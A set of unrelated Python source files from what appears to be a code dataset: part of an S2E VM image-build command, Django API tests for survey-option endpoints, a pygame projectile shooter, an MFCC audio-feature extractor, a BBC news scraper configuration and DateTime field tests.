               'to list available images')
    raise CommandError(message)
def _get_base_image_and_app(image_name):
x = image_name.split('/')
if len(x) == 1:
return x[0], None
if len(x) == 2:
return x
raise CommandError(f'Invalid image name {image_name}')
def _has_app_image(image_names):
for name in image_names:
if '/' in name:
return True
return False
def _check_product_keys(image_descriptors, image_names):
missing_keys = []
for image_name in image_names:
image = image_descriptors[image_name]
if 'product_key' in image:
if not image['product_key']:
missing_keys.append(image_name)
ios = image_descriptors[image_name].get('os', {})
if 'product_key' in ios:
if not ios['product_key']:
missing_keys.append(image_name)
if missing_keys:
logger.error('The following images require a product key:')
for image in missing_keys:
logger.error(' * %s', image)
raise CommandError('Please update images.json and/or apps.json.')
def _check_iso(templates, app_templates, iso_dir, image_names):
    """
    Verify that every ISO required by the selected images exists locally.

    Descriptors with an iso 'url' are downloadable and need nothing on
    disk; otherwise the iso 'name' must be present under ``iso_dir``.
    Raises CommandError when ``iso_dir`` is not given or the file is
    missing.
    """
    for image_name in image_names:
        base_image, app_name = _get_base_image_and_app(image_name)
        # Check the base image descriptor and, for app images, the app's too.
        descriptors = [templates[base_image]]
        if app_name:
            descriptors.append(app_templates[app_name])
        for desc in descriptors:
            iso = desc.get('iso', {})
            if iso.get('url', ''):
                continue  # ISO will be downloaded — no local file needed
            name = iso.get('name', '')
            if not name:
                continue  # this descriptor needs no ISO at all
            if not iso_dir:
                raise CommandError(
                    'Please use the --iso-dir option to specify the path '
                    f'to a folder that contains {name}'
                )
            path = os.path.join(iso_dir, name)
            if not os.path.exists(path):
                raise CommandError(f'The image {image_name} requires {path}, which could not be found')
def _is_port_available(port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("127.0.0.1", port))
return True
except socket.error:
return False
finally:
s.close()
def _start_ftp_server(image_path, port):
    """
    Start an anonymous FTP server rooted at ``image_path`` on a daemon
    thread and return the FTPServer so the caller can close it later.

    Guests reach the host through QEMU slirp, hence the 10.0.2.2
    masquerade address.
    """
    authorizer = DummyAuthorizer()
    # 'elradfmwMT' grants full read/write permissions to anonymous users.
    authorizer.add_anonymous(image_path, perm='elradfmwMT')
    handler = FTPHandler
    handler.authorizer = authorizer
    handler.masquerade_address = '10.0.2.2'
    # QEMU slirp won't let the guest reconnect if timeout happens, so we disable it
    handler.timeout = None
    server = FTPServer(("127.0.0.1", port), handler)
    thread = Thread(target=_run_ftp_server, args=[server])
    thread.daemon = True  # don't keep the interpreter alive on exit
    thread.start()
    time.sleep(1)  # give the server a moment to start listening
    return server
def _run_ftp_server(server):
    """Run ``server.serve_forever()`` and always close connections on exit."""
    try:
        server.serve_forever()
    finally:
        logger.info('FTP server terminated')
        server.close_all()
def _get_archive_rules(image_path, rule_names):
    """
    Map image names to the ``<image>.tar.xz`` archive targets to build.

    Raises CommandError when any name is an app image, since archiving
    app images is not supported.
    """
    if _has_app_image(rule_names):
        raise CommandError('Building archives of app images is not supported yet')
    archive_rules = []
    for r in rule_names:
        archive_rules.append(os.path.join(image_path, f'{r}.tar.xz'))
    logger.info('The following archives will be built:')
    for a in archive_rules:
        logger.info(' * %s', a)
    return archive_rules
def _download_images(image_path, image_names, templates):
    """
    Download pre-built base images into ``image_path``.

    Raises CommandError for app images, which cannot be downloaded.
    """
    if _has_app_image(image_names):
        raise CommandError('Downloading of app images is not supported yet')
    image_downloader = ImageDownloader(templates)
    image_downloader.download_images(image_names, image_path)
    logger.info('Successfully downloaded images: %s', ', '.join(image_names))
class Command(EnvCommand):
    """
    Builds an image.

    Lists, builds, downloads, or archives S2E guest VM images by
    delegating the actual work to the guest-images Makefile.
    """

    help = 'Build an image.'

    def __init__(self):
        super().__init__()
        # Defaults; overridden from command-line options in handle().
        self._headless = True
        self._use_kvm = True
        self._num_cores = 1
        self._has_cow = False  # set by the copy-on-write probe in handle()

    def add_arguments(self, parser):
        """Register the command-line options of the image_build subcommand."""
        super().add_arguments(parser)
        parser.add_argument('name',
                            help='The name of the image to build. If empty,'
                                 ' shows available images', nargs='*')
        parser.add_argument('-g', '--gui', action='store_true',
                            help='Display QEMU GUI during image build')
        parser.add_argument('-c', '--cores', required=False, default=2,
                            type=int,
                            help='The number of cores used when building the '
                                 'VM image. Defaults to 2')
        parser.add_argument('-x', '--clean', action='store_true',
                            help='Deletes all images and rebuild them from '
                                 'scratch')
        parser.add_argument('-a', '--archive', action='store_true',
                            help='Creates an archive for the specified image')
        parser.add_argument('-p', '--ftp-port', required=False, default=15468, type=int,
                            help='Port for the internal FTP server to receive files from guest VMs during build')
        parser.add_argument('-d', '--download', action='store_true',
                            help='Download image from the repository instead '
                                 'of building it')
        parser.add_argument('-i', '--iso-dir',
                            help='Path to folder that stores ISO files of Windows images')
        parser.add_argument('-n', '--no-kvm', action='store_true',
                            help='Disable KVM during image build')

    def handle(self, *args, **options):
        """Validate the environment, then list, clean, download or build images."""
        # If DISPLAY is missing, don't use headless mode
        if options['gui']:
            self._headless = False
        # If KVM has been explicitly disabled, don't use it during the build
        if options['no_kvm']:
            self._use_kvm = False
        self._num_cores = options['cores']
        # The path could have been deleted by a previous clean
        if not os.path.exists(self.image_path()):
            os.makedirs(self.image_path())
        img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
        if options['clean']:
            self._invoke_make(img_build_dir, ['clean'])
            return
        image_names = options['name']
        templates = get_image_templates(img_build_dir)
        app_templates = get_app_templates(img_build_dir)
        images, image_groups, image_descriptors = get_all_images(templates, app_templates)
        # With no image names given, just print what is available and exit.
        if not image_names:
            self._print_image_list(images, image_groups, image_descriptors)
            print('\nRun ``s2e image_build <name>`` to build an image. '
                  'Note that you must run ``s2e build`` **before** building '
                  'an image')
            return
        image_names = translate_image_name(images, image_groups, image_names)
        logger.info('The following images will be built:')
        for image in image_names:
            logger.info(' * %s', image)
        if options['download']:
            _download_images(self.image_path(), image_names, templates)
            return
        rule_names = image_names
        if options['archive']:
            rule_names = _get_archive_rules(self.image_path(), image_names)
        iso_dir = os.path.abspath(options['iso_dir']) if options['iso_dir'] else None
        # Check for optional product keys and iso directories.
        # These may or may not be required, depending on the set of images.
        _check_product_keys(image_descriptors, image_names)
        _check_iso(templates, app_templates, iso_dir, image_names)
        if self._use_kvm:
            _check_kvm()
            _check_groups_kvm()
        _check_groups_docker()
        _check_vmlinux()
        self._has_cow = _check_cow(self.image_path())
        # VirtualBox/VMware hold the virtualization hardware and conflict
        # with KVM, so they must not be running.
        if self._use_kvm:
            _check_virtualbox()
            _check_vmware()
        if not _is_port_available(options['ftp_port']):
            raise CommandError(f'localhost:{options["ftp_port"]} is not available. Check that the port is free or '
                               'specify a port with --ftp-port')
        # Clone kernel if needed.
        # This is necessary if the s2e env has been initialized with -b flag.
        self._clone_kernel()
        server = _start_ftp_server(self.image_path(), options['ftp_port'])
        self._invoke_make(img_build_dir, rule_names, options['ftp_port'], iso_dir)
        logger.success('Built image(s) \'%s\'', ' '.join(image_names))
        server.close_all()

    def _invoke_make(self, img_build_dir, rule_names, ftp_port=0, iso_dir=''):
        """Run the guest-images Makefile for ``rule_names`` with a prepared env."""
        env = os.environ.copy()
        env['S2E_INSTALL_ROOT'] = self.install_path()
        env['S2E_LINUX_KERNELS_ROOT'] = \
            self.source_path(CONSTANTS['repos']['images']['linux'])
        env['OUTDIR'] = self.image_path()
        env['QEMU_FTP_PORT'] = str(ftp_port)
        env['ISODIR'] = iso_dir if iso_dir else ''
        env['DEBUG_INTERMEDIATE_RULES'] = '1' if self._has_cow else '0'
        logger.debug('Invoking makefile with:')
        logger.debug('export S2E_INSTALL_ROOT=%s', env['S2E_INSTALL_ROOT'])
        logger.debug('export S2E_LINUX_KERNELS_ROOT=%s', env['S2E_LINUX_KERNELS_ROOT'])
        logger.debug('export OUTDIR=%s', env['OUTDIR'])
        logger.debug('export ISODIR=%s', env.get('ISODIR', ''))
        logger.debug('export DEBUG_INTERMEDIATE_RULES=%s', env.get('DEBUG_INTERMEDIATE_RULES', ''))
        if self._headless:
            logger.warning('Image creation will run in headless mode. '
                           'Use --gui to see graphic output for debugging')
        else:
            # The Makefile interprets an empty GRAPHICS variable as "show GUI".
            env['GRAPHICS'] = ''
        if not self._use_kvm:
            env['QEMU_KVM'] = ''
            logger.warning('Image build without KVM. This will be slow')
        try:
            make = sh.Command('make').bake(file=os.path.join(img_build_dir,
                                                             'Makefile'),
                                           directory=self.image_path(),
                                           _env=env, _fg=True)
            make_image = make.bake(j=self._num_cores, r=True, warn_undefined_variables=True)
            make_image(sorted(rule_names))
        except ErrorReturnCode as e:
            raise CommandError(e) from e

    def _clone_kernel(self):
        """Clone the S2E Linux kernels repository if it is not present yet."""
        kernels_root = self.source_path(CONSTANTS['repos']['images']['linux'])
        if os.path.exists(kernels_root):
            logger.info('Kernel repository already exists in %s', kernels_root)
            return
        logger.info('Cloning kernels repository to %s', kernels_root)
        kernels_repo = CONSTANTS['repos']['images']['linux']
        repos.git_clone_to_source(self.env_path(), kernels_repo)

    def _print_image_list(self, images, image_groups, image_descriptors):
        """Print all buildable image groups and images, aligned in columns."""
        img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
        templates = get_image_templates(img_build_dir)
        if not templates:
            images_json_path = os.path.join(img_build_dir, 'images.json')
            raise CommandError('No images available to build. Make sure that '
                               f'{images_json_path} exists and is valid')

        def get_max_len(lst):
            # Width of the longest name, used for column alignment below.
            ret = 0
            for item in lst:
                if len(item) > ret:
                    ret = len(item)
            return ret

        print('Available image groups:')
        max_group_len = get_max_len(image_groups)
        for group in image_groups:
            print(f' * {group:{max_group_len}} - Build {group} images')
        print('\nAvailable images:')
        max_image_len = get_max_len(images)
        for image in sorted(images):
            print(f' * {image:{max_image_len}} - {image_descriptors[image]["name"]}')

    def _print_apps_list(self):
        """Print every app image as ``base/app`` with its description."""
        img_build_dir = self.source_path(CONSTANTS['repos']['images']['build'])
        app_templates = get_app_templates(img_build_dir)
        if not app_templates:
            apps_json_path = os.path.join(img_build_dir, 'apps.json')
            raise CommandError('No apps available to build. Make sure that '
                               f'{apps_json_path} exists and is valid')
        print('Available applications:')
        for app_template, desc in sorted(app_templates.items()):
            for base_image in desc['base_images']:
                print(f' * {base_image}/{app_template} - {desc["name"]}')
|
5,187 | 1152f144e17c11416f9ed56b4408f18615b16dc2 | from eums.test.api.api_test_helpers import create_option
from eums.test.factories.question_factory import MultipleChoiceQuestionFactory
from eums.test.api.authenticated_api_test_case import AuthenticatedAPITestCase
from eums.test.config import BACKEND_URL
from eums.models.question import MultipleChoiceQuestion
ENDPOINT_URL = BACKEND_URL + 'option/'
RECEIVED_OPTIONS_ENDPOINT_URL = BACKEND_URL + 'received-options/'
QUALITY_OPTIONS_ENDPOINT_URL = BACKEND_URL + 'quality-options/'
SATISFIED_OPTIONS_ENDPOINT_URL = BACKEND_URL + 'satisfied-options/'
class OptionsEndPointTest(AuthenticatedAPITestCase):
    """Tests for the generic option endpoint: creation and sorted listing."""

    def test_should_create_item(self):
        """POSTing text + question id creates an option and echoes it back."""
        question = MultipleChoiceQuestionFactory()
        option_details = {'text': "Bad", 'question': question.id}
        response = self.client.post(ENDPOINT_URL, option_details, format='json')
        self.assertEqual(response.status_code, 201)
        self.assertDictContainsSubset(option_details, response.data)

    def test_should_get_options_sorted_by_text(self):
        """GET returns options ordered alphabetically by their text."""
        question = MultipleChoiceQuestionFactory()
        option_one_details = {'text': "B Option", 'question': question.id}
        option_two_details = {'text': "A Option", 'question': question.id}
        create_option(self, option_one_details)
        create_option(self, option_two_details)
        get_response = self.client.get(ENDPOINT_URL)
        self.assertEqual(get_response.status_code, 200)
        # "A Option" sorts before "B Option".
        self.assertDictContainsSubset(option_two_details, get_response.data[0])
        self.assertDictContainsSubset(option_one_details, get_response.data[1])
class ReceivedOptionsEndPointTest(AuthenticatedAPITestCase):
    """Tests that the received-options endpoint only returns options of
    the 'productReceived' question."""

    def test_should_only_get_received_options(self):
        received_question, _ = MultipleChoiceQuestion.objects.get_or_create(
            uuids=['6c1cf97d-59b8-4bd3-815b-783abd3dfad9'],
            text='Was product received?', label='productReceived'
        )
        other_question = MultipleChoiceQuestionFactory()
        option_one_details = {'text': "Yes", 'question': received_question.id}
        option_two_details = {'text': "No", 'question': received_question.id}
        option_three_details = {'text': "Other", 'question': other_question.id}
        create_option(self, option_one_details)
        create_option(self, option_two_details)
        create_option(self, option_three_details)
        get_response = self.client.get(RECEIVED_OPTIONS_ENDPOINT_URL)
        self.assertEqual(get_response.status_code, 200)
        self.assertDictContainsSubset(option_one_details, get_response.data[0])
        # NOTE(review): index 2 (not 1) — presumably the endpoint also
        # returns pre-existing options; confirm against the view's
        # queryset ordering.
        self.assertDictContainsSubset(option_two_details, get_response.data[2])
        self.assertNotIn(option_three_details, get_response.data)
class QualityOptionsEndPointTest(AuthenticatedAPITestCase):
    """Tests that the quality-options endpoint returns only the
    'qualityOfProduct' question's options, sorted by text."""

    def test_should_only_get_quality_options_sorted_by_text(self):
        quality_question, _ = MultipleChoiceQuestion.objects.get_or_create(
            uuids=['6c1cf92d-59b8-4bd3-815b-783abd3dfad9'],
            text='What is the quality of the product?', label='qualityOfProduct'
        )
        other_question = MultipleChoiceQuestionFactory()
        option_one_details = {'text': "B Option", 'question': quality_question.id}
        option_two_details = {'text': "A Option", 'question': quality_question.id}
        option_three_details = {'text': "C Option", 'question': other_question.id}
        create_option(self, option_one_details)
        create_option(self, option_two_details)
        create_option(self, option_three_details)
        get_response = self.client.get(QUALITY_OPTIONS_ENDPOINT_URL)
        self.assertEqual(get_response.status_code, 200)
        # Sorted by text: "A Option" precedes "B Option"; the option of
        # the unrelated question is filtered out.
        self.assertDictContainsSubset(option_two_details, get_response.data[0])
        self.assertDictContainsSubset(option_one_details, get_response.data[1])
        self.assertNotIn(option_three_details, get_response.data)
class SatisfiedOptionsEndPointTest(AuthenticatedAPITestCase):
    """Tests that the satisfied-options endpoint only returns options of
    the 'satisfiedWithProduct' question."""

    def test_should_only_get_satisfied_options(self):
        satisfied_question, _ = MultipleChoiceQuestion.objects.get_or_create(
            uuids=['6c1cf27d-59b8-4bd3-815b-783abd3dfad9'],
            text='Are you satisfied with the product?', label='satisfiedWithProduct'
        )
        other_question = MultipleChoiceQuestionFactory()
        option_one_details = {'text': "Yes", 'question': satisfied_question.id}
        option_two_details = {'text': "No", 'question': satisfied_question.id}
        option_three_details = {'text': "Other", 'question': other_question.id}
        create_option(self, option_one_details)
        create_option(self, option_two_details)
        create_option(self, option_three_details)
        get_response = self.client.get(SATISFIED_OPTIONS_ENDPOINT_URL)
        self.assertEqual(get_response.status_code, 200)
        self.assertDictContainsSubset(option_one_details, get_response.data[0])
        # NOTE(review): index 2 (not 1) — presumably extra options exist
        # in the response; verify against the endpoint's ordering.
        self.assertDictContainsSubset(option_two_details, get_response.data[2])
        self.assertNotIn(option_three_details, get_response.data)
5,188 | 0dd5511c0e39f113c46785be78a898e79bc45a21 | import pygame
import os
import random
# Launch velocity components (interactive input left disabled).
#Vx = float(input("Input Vx : "))
#Vy = float(input("Input Vy : "))
Vx = 20
Vy = 20
#GEOMETRY
screen_width = 1000
screen_height = 600
FPS = 30
#COLOR (RGB tuples used for bullets and traces)
BLUE = (0, 0, 255)
BLACK = (0, 0, 0)
GREEN = (204, 153, 255)
RED = (255, 0, 0)
WHITE = (155, 25, 0)
colorList = [BLUE, BLACK, GREEN, RED, WHITE]
#Initialize pygame
pygame.init()
path = os.path.dirname(__file__)
img_path = os.path.join(path, 'Gallery')
background = pygame.image.load('Gallery/parallax.png')
background = pygame.transform.scale(background, [screen_width, screen_height])
win = pygame.display.set_mode([screen_width, screen_height])
pygame.display.set_caption("Stateczek shoot Projectile")
clock = pygame.time.Clock()
# Physics constants: pixels per world unit, gravity, per-frame time step.
pixelRatio = 10
accel = -9.81
timeStep = 1 / FPS
font = pygame.font.SysFont('comic', 50, False, False)
#####CREATE SPRITE#####
class player(pygame.sprite.Sprite):
    """The player's ship sprite, moved vertically by the arrow keys."""

    # Shared sprite image, loaded once at class definition time.
    image = pygame.image.load(os.path.join(path, 'Gallery', 'life.png'))

    def __init__(self, x, y):
        """Place the player at (x, y) with a fixed per-frame speed."""
        pygame.sprite.Sprite.__init__(self)
        self.x = x
        self.y = y
        self.move = 10  # vertical speed in pixels per key press

    def draw(self, win):
        """Blit the player's image onto *win* at its current position."""
        win.blit(self.image, (self.x, self.y))
#####CREATE PROJECTILE SHOOT#####
class projectile(pygame.sprite.Sprite):
    """A bullet that follows projectile-motion kinematics each frame."""

    def __init__(self, x, y, ux, uy):
        pygame.sprite.Sprite.__init__(self)
        self.x = x + 30  # spawn slightly in front of the shooter
        self.y = y
        self.startX = self.x
        self.startY = self.y
        self.horVel = ux  # horizontal launch velocity
        self.verVel = uy  # vertical launch velocity
        self.color = random.choice(colorList)
        self.bulletTime = 0.0  # elapsed flight time (seconds)
        self.status = 1  # 1 = in flight, 0 = dead (off-screen or landed)

    def update(self):
        """Advance one time step: x = v*t, y = v*t + a*t^2/2 (screen y is flipped)."""
        global maxHeight
        global maxHeightPos
        global landingPos
        global ranges
        global trace
        if self.y <= screen_height:
            self.bulletTime += timeStep
            # Screen y grows downward, hence the negated vertical displacement.
            self.x = (self.horVel * self.bulletTime) * pixelRatio + self.startX
            self.y = -(self.verVel * self.bulletTime + 0.5 * accel * (
                    self.bulletTime ** 2)) * pixelRatio + self.startY
            trace.append([self.x, self.y])
            if self.x >= screen_width:
                self.status = 0
            if self.y < 0:
                self.status = 0
        else:  # bullet hit the ground
            self.status = 0
        pygame.display.update()

    def draw(self, win):
        pygame.draw.circle(win, self.color, (round(self.x), round(self.y)), 6)
        # NOTE(review): draws the shared global traceShow rather than this
        # bullet's own trace — confirm this is intended.
        for t in traceShow:
            pygame.draw.circle(win, self.color, (round(t[0]), round(t[1])), 1)
#####CREATE ENEMYS#####
class enemy(pygame.sprite.Sprite):
    """An enemy ship that bounces vertically between the screen edges."""
    im = pygame.image.load(os.path.join(path, 'Gallery', 'stateczek.png'))
    im2 = pygame.image.load(os.path.join(path, 'Gallery', 'stateczek.png'))
    im3 = pygame.image.load(os.path.join(path, 'Gallery', 'stateczek.png'))
    imageList = [im, im2, im3]  # NOTE(review): all three load the same file
    def __init__(self, x, y):
        pygame.sprite.Sprite.__init__(self)
        self.x = x
        self.y = y
        self.hitbox = (self.x, self.y, 60, 60)  # (x, y, width, height)
        self.vel = 6  # vertical speed; the sign encodes direction
        self.imageRandom = random.choice(self.imageList)
    def draw(self, win):
        self.move_enemy()  # drawing a frame also advances the bounce
        win.blit(self.imageRandom, (self.x, self.y))
    def move_enemy(self):
        # Bounce: move down while vel > 0, up while vel < 0, flipping the
        # sign at the band edges and keeping the hitbox in sync.
        if self.vel > 0:
            if self.y + self.vel < 560:
                self.y += self.vel
                self.hitbox = (self.x, self.y, 60, 60)
            else:
                self.vel = self.vel * -1
        else:
            # NOTE(review): vel is negative here, so `self.y - self.vel`
            # equals y + |vel|; the flip therefore triggers near y ~= 4, not
            # the apparent limit of 10 -- confirm whether `y + vel > 10`
            # was intended.
            if self.y - self.vel > 10:
                self.y += self.vel
                self.hitbox = (self.x, self.y, 60, 60)
            else:
                self.vel = self.vel * -1
#####FUNCTION SHOW DISPLAY####
def display(s):
    """Redraw one full frame: background, player, enemies, score, bullets.

    s -- current score, rendered near the top of the window.
    Reads the module-level win/background/player1/Monster*/font/bullets.
    """
    win.blit(background, (0, 0))
    player1.draw(win)
    Monster1.draw(win)
    Monster2.draw(win)
    Monster3.draw(win)
    score = font.render('Score : ' + str(s), 1, (0, 0, 0))
    win.blit(score, (430, 30))
    for bullet in bullets:
        bullet.draw(win)
    pygame.display.update()
# mainloop
# Initial state: the player starts at the left edge; the three enemies
# spawn at random positions in three vertical bands on the right side.
Y = 300
X = 30
X1 = random.randint(500, 590)
X2 = random.randint(660, 760)
X3 = random.randint(830, 900)
Y1 = random.randint(60, 720)
Y2 = random.randint(40, 720)
Y3 = random.randint(60, 720)
player1 = player(X, Y)
Monster1 = enemy(X1, Y1)
Monster2 = enemy(X2, Y2)
Monster3 = enemy(X3, Y3)
bullets = []  # in-flight projectiles (at most one, gated by shootStage)
trace = []  # path points of the current shot
traceShow = []  # snapshot of trace used when drawing the trail
color = []  # NOTE(review): never used below -- looks dead
resetTrace = False  # NOTE(review): never used below -- looks dead
shootStage = 0  # 0 = ready to fire, 1 = a bullet is in flight
showText = 0
maxHeight = 0
ranges = 0
r = 1
s = 0  # score
### START ###
# Main loop: poll input, move the player inside the window bounds, fire and
# advance at most one projectile, resolve hits, and redraw at FPS frames/s.
# NOTE(review): `runing` (sic), Vx/Vy, screen_width/height and FPS come from
# earlier in the file -- confirm they are defined before this point.
runing = True
while runing:
    clock.tick(FPS)
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            runing = False
    keys = pygame.key.get_pressed()
    # Vertical movement, clamped to the window.
    if keys[pygame.K_UP]:
        if player1.y > 0:
            player1.y -= player1.move
        else:
            player1.y = 0
    if keys[pygame.K_DOWN]:
        if player1.y < screen_height-30:
            player1.y += player1.move
            print(player1.y)
        else:
            player1.y = screen_height-30
            print(player1.y)
    # Horizontal movement, clamped so the player stays in the left region.
    if keys[pygame.K_RIGHT]:
        if player1.x < screen_width-540:
            player1.x += player1.move
            print(player1.x)
        else:
            player1.x = screen_width-540
            print(player1.x)
    if keys[pygame.K_LEFT]:
        if player1.x > 0:
            player1.x -= player1.move
        else:
            player1.x = 0
    if keys[pygame.K_SPACE]:
        # shootStage gates firing so only one projectile exists at a time.
        if shootStage == 0:
            bullets.append(projectile(player1.x, player1.y, Vx, Vy))
            shootStage = 1
            trace.clear()
    # FIX: iterate over a snapshot -- the body removes spent bullets, and
    # mutating a list while iterating it silently skips elements.
    for bullet in list(bullets):
        bullet.update()
        traceShow = trace
        # Axis-aligned overlap tests (bullet radius ~5) against each enemy's
        # hitbox (x, y, w, h); a hit despawns the bullet, respawns the enemy
        # at a new random position in its band, and scores a point.
        if bullet.y - 5 < Monster1.hitbox[1] + Monster1.hitbox[3] and bullet.y + 5 > Monster1.hitbox[1]:
            if bullet.x + 5 > Monster1.hitbox[0] and bullet.x - 5 < Monster1.hitbox[0] + Monster1.hitbox[2]:
                bullet.status = 0
                X1 = random.randint(500, 590)
                Y1 = random.randint(60, 720)
                Monster1 = enemy(X1, Y1)
                s += 1
        if bullet.y - 5 < Monster2.hitbox[1] + Monster2.hitbox[3] and bullet.y + 5 > Monster2.hitbox[1]:
            if bullet.x + 5 > Monster2.hitbox[0] and bullet.x - 5 < Monster2.hitbox[0] + Monster2.hitbox[2]:
                bullet.status = 0
                X2 = random.randint(660, 760)
                Y2 = random.randint(60, 720)
                Monster2 = enemy(X2, Y2)
                s += 1
        if bullet.y - 5 < Monster3.hitbox[1] + Monster3.hitbox[3] and bullet.y + 5 > Monster3.hitbox[1]:
            if bullet.x + 5 > Monster3.hitbox[0] and bullet.x - 5 < Monster3.hitbox[0] + Monster3.hitbox[2]:
                bullet.status = 0
                X3 = random.randint(830, 900)
                Y3 = random.randint(60, 720)
                Monster3 = enemy(X3, Y3)
                s += 1
        if bullet.status == 0:
            shootStage = 0
            bullets.remove(bullet)
    display(s)
    pygame.display.update()
pygame.quit()
|
5,189 | cca1a491e2a48b4b0c7099a6c54e528158ef30bb | #!/usr/bin/python
import sys, os, glob, numpy
wd = os.path.dirname(os.path.realpath(__file__))
sys.path.append(wd + '/python_speech_features')
from features import mfcc, logfbank
import scipy.io.wavfile as wav
DIR = '/home/quiggles/Desktop/513music/single-genre/classify-me/subset'
OUTDIR = wd + '/songdata/subset'
# def getMFCC(filename):
# (rate,sig) = wav.read(filename)
# mfcc_feat = mfcc(sig,rate)
# l = len(mfcc_feat)/4
# quartileMean1 = numpy.mean(mfcc_feat[:l], axis=0)
# quartileMean2 = numpy.mean(mfcc_feat[l:2*l], axis=0)
# quartileMean3 = numpy.mean(mfcc_feat[2*l:3*l], axis=0)
# quartileMean4 = numpy.mean(mfcc_feat[3*l:], axis=0)
# return numpy.concatenate([quartileMean1, quartileMean2, quartileMean3, quartileMean4])
# def getLogFBank(filename):
# (rate,sig) = wav.read(filename)
# logfbank_feat = logfbank(sig,rate)
# l = len(logfbank_feat)/4
# quartileMean1 = numpy.mean(logfbank_feat[:l], axis=0)
# quartileMean2 = numpy.mean(logfbank_feat[l:2*l], axis=0)
# quartileMean3 = numpy.mean(logfbank_feat[2*l:3*l], axis=0)
# quartileMean4 = numpy.mean(logfbank_feat[3*l:], axis=0)
# return numpy.concatenate([quartileMean1, quartileMean2, quartileMean3, quartileMean4])
def getQuartileMeans(values):
    """Mean feature vector of each temporal quarter of *values*.

    values -- sequence of per-frame feature vectors (e.g. MFCC rows);
              assumed to hold at least 4 frames.
    Returns a list of four per-quarter means (numpy arrays, or scalars for
    1-D input), in chronological order; the last quarter absorbs the
    remainder when len(values) is not divisible by 4.
    """
    # FIX: use floor division -- under Python 3, `/` yields a float and
    # float slice indices raise TypeError.
    l = len(values) // 4
    quartileMean1 = numpy.mean(values[:l], axis=0)
    quartileMean2 = numpy.mean(values[l:2*l], axis=0)
    quartileMean3 = numpy.mean(values[2*l:3*l], axis=0)
    quartileMean4 = numpy.mean(values[3*l:], axis=0)
    return [quartileMean1, quartileMean2, quartileMean3, quartileMean4]
def getMFCC(rate, sig):
    """Concatenated per-quarter mean MFCC vector for the signal *sig*."""
    features = mfcc(sig, rate)
    return numpy.concatenate(getQuartileMeans(features))
def getLogFBank(rate, sig):
    """Concatenated per-quarter mean log filterbank vector for *sig*."""
    features = logfbank(sig, rate)
    return numpy.concatenate(getQuartileMeans(features))
def getData(filename, outdir=None):
    """Return the MFCC feature vector for the .wav file *filename*.

    When *outdir* is given and already holds a cached CSV for this file,
    computation is skipped and None is returned (writeData performs the
    same existence check before writing, so nothing is lost).
    """
    if outdir is not None:
        cached = outdir + '/' + os.path.splitext(os.path.basename(filename))[0] + ".csv"
        if os.path.exists(cached):
            return None
    rate, sig = wav.read(filename)
    return getMFCC(rate, sig)
def writeData(filename, outdir, values):
    """Write *values* as one comma-separated line to outdir/<stem>.csv.

    filename -- source file whose basename (without extension) names the CSV.
    Does nothing if the target CSV already exists (acts as a cache).
    """
    # Hoist the path: the original recomputed it three times.
    out_path = outdir + '/' + os.path.splitext(os.path.basename(filename))[0] + ".csv"
    if not os.path.exists(out_path):
        with open(out_path, 'w') as f:
            # str.join replaces the manual add-a-comma-flag loop.
            f.write(','.join(str(val) for val in values))
            f.write('\n')
def generateMFCCData(indir, outdir):
    """Extract MFCC features for every .wav in *indir* into CSVs in *outdir*.

    Existing CSVs in outdir are removed first. After a successful extraction
    the source .wav and its paired .mp3 are moved into indir/classify-me
    (unless indir is already a classify-me directory). Failures are reported
    and skipped so one bad file does not abort the batch.
    """
    for f in glob.glob(outdir + '/*.csv'):
        os.remove(f)
    for f in glob.glob(indir + '/*.wav'):
        try:
            writeData(f, outdir, getData(f, outdir))
            newfilename = os.path.splitext(os.path.basename(f))[0]
            print('YES: ' + newfilename)
            if 'classify-me' not in indir:
                os.rename(f, indir + "/classify-me/" + newfilename + ".wav")
                os.rename(indir + '/' + newfilename + ".mp3", indir + "/classify-me/" + newfilename + ".mp3")
        except Exception as e:
            # FIX: the bare `except:` also swallowed KeyboardInterrupt and
            # SystemExit and hid the cause; stay best-effort but report it.
            print('NO: ' + f + ' (' + str(e) + ')')
if __name__ == '__main__':
    generateMFCCData(DIR, OUTDIR)
|
5,190 | 3c22fbfd7d83ff3ecacabc3c88af2169fa5906b9 | """ [BBC] Web Scraper """
import os
from .abstract_crawler import AbstractWebCrawler
class BBCCrawler(AbstractWebCrawler):
    """ [BBC] Web Scraper

    Declarative crawler: every attribute below configures the generic
    crawling/parsing machinery in AbstractWebCrawler.
    """
    # Spider Properties
    name = "web_bbc"
    # Crawler Properties
    resource_link = 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security'
    resource_label = 'bbc'
    # TODO Move it to the super class
    custom_settings = {
        'ITEM_PIPELINES': {
            'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500
        }
    }
    # CSS selectors consumed by the base crawler.
    links_to_articles_query = 'article > header > div > h3 > a::attr(href)'
    # Placeholder selector -- pagination is AJAX-driven on this site, so the
    # generic "next page" selector presumably matches nothing by design.
    links_to_pages_query = 'dummy' # dynamic ajax pagination
    extract_title_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'
    extract_datetime_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'
    extract_content_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'
5,191 | 92b22ea23ad0cf4e16c7d19d055b7ec152ca433a | from scheme import *
from tests.util import *
class TestDateTime(FieldTestCase):
    """Tests for the scheme DateTime field (parsing, bounds, description)."""
    def test_instantiation(self):
        """minimum/maximum must be datetimes or parseable text, not bools."""
        with self.assertRaises(TypeError):
            DateTime(minimum=True)
        with self.assertRaises(TypeError):
            DateTime(maximum=True)
    def test_processing(self):
        """Round-trip: inbound ISO text -> local-tz datetime; outbound
        naive/local/UTC datetimes -> the same UTC ISO string."""
        field = DateTime()
        self.assert_processed(field, None)
        self.assert_not_processed(field, 'invalid', True)
        now = datetime.now().replace(microsecond=0)
        now_local = now.replace(tzinfo=LOCAL)
        now_utc = now_local.astimezone(UTC)
        now_text = now_utc.strftime('%Y-%m-%dT%H:%M:%SZ')
        self.assertEqual(field.process(now_text, INBOUND, True), now_local)
        self.assertEqual(field.process(now, OUTBOUND, True), now_text)
        self.assertEqual(field.process(now_local, OUTBOUND, True), now_text)
